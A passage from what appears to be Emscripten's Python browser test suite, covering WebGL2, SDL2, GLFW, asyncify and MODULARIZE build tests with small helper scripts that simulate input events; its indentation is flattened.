self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.run_process([EMCC, '-c', 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'INITIAL_MEMORY=33554432'])
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'MODULARIZE=1', '-s', 'MINIMAL_RUNTIME=1'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
